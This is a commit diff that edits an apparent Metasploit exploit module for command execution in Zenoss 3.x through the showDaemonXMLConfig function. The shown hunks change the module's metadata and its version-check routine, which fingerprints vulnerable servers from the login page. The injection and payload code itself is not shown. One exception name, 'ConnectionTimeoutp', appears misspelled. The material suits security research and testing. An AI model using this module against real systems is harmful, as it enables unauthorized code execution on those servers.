minor improvements to Zenoss showdaemonxmlconfig exploit

unstable
bcoles 2012-08-01 20:15:45 +09:30
parent bdf8f1a543
commit 2bf0899d09
1 changed files with 18 additions and 13 deletions

View File

@ -6,7 +6,6 @@
## ##
require 'msf/core' require 'msf/core'
require 'msf/core/handler/reverse_tcp'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking Rank = GoodRanking
@ -15,9 +14,9 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Zenoss <= 3.2.1 showDaemonXMLConfig Command Execution', 'Name' => 'Zenoss 3 showDaemonXMLConfig Command Execution',
'Description' => %q{ 'Description' => %q{
This module exploits a command execution vulnerability in Zenoss <= 3.2.1 This module exploits a command execution vulnerability in Zenoss 3.x
which could be abused to allow authenticated users to execute arbitrary which could be abused to allow authenticated users to execute arbitrary
code under the context of the 'zenoss' user. The show_daemon_xml_configs() code under the context of the 'zenoss' user. The show_daemon_xml_configs()
function in the 'ZenossInfo.py' script calls Popen() with user function in the 'ZenossInfo.py' script calls Popen() with user
@ -31,10 +30,10 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'Author' => 'Author' =>
[ [
'Brendan Coles <bcoles[at]gmail[dot]com>', # Discovery and exploit 'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision: 2 $', 'Version' => '$Revision: 3 $',
'Privileged' => false, 'Privileged' => false,
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'Platform' => 'unix', 'Platform' => 'unix',
@ -68,15 +67,21 @@ class Metasploit3 < Msf::Exploit::Remote
def check def check
@peer = "#{rhost}:#{rport}"
# retrieve software version from login page # retrieve software version from login page
res = send_request_raw({ begin
'method' => "GET", res = send_request_raw({
'uri' => "/zport/acl_users/cookieAuthHelper/login_form" 'method' => "GET",
}) 'uri' => "/zport/acl_users/cookieAuthHelper/login_form"
return Exploit::CheckCode::Unknown if res.nil? })
return Exploit::CheckCode::Vulnerable if res.body =~ /<p>Copyright &copy; 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+<span>3\.2\.1<\/span>/ return Exploit::CheckCode::Vulnerable if res.body =~ /<p>Copyright &copy; 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+<span>3\./
return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/ return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
print_error("#{@peer} - Connection failed")
end
return Exploit::CheckCode::Unknown
end end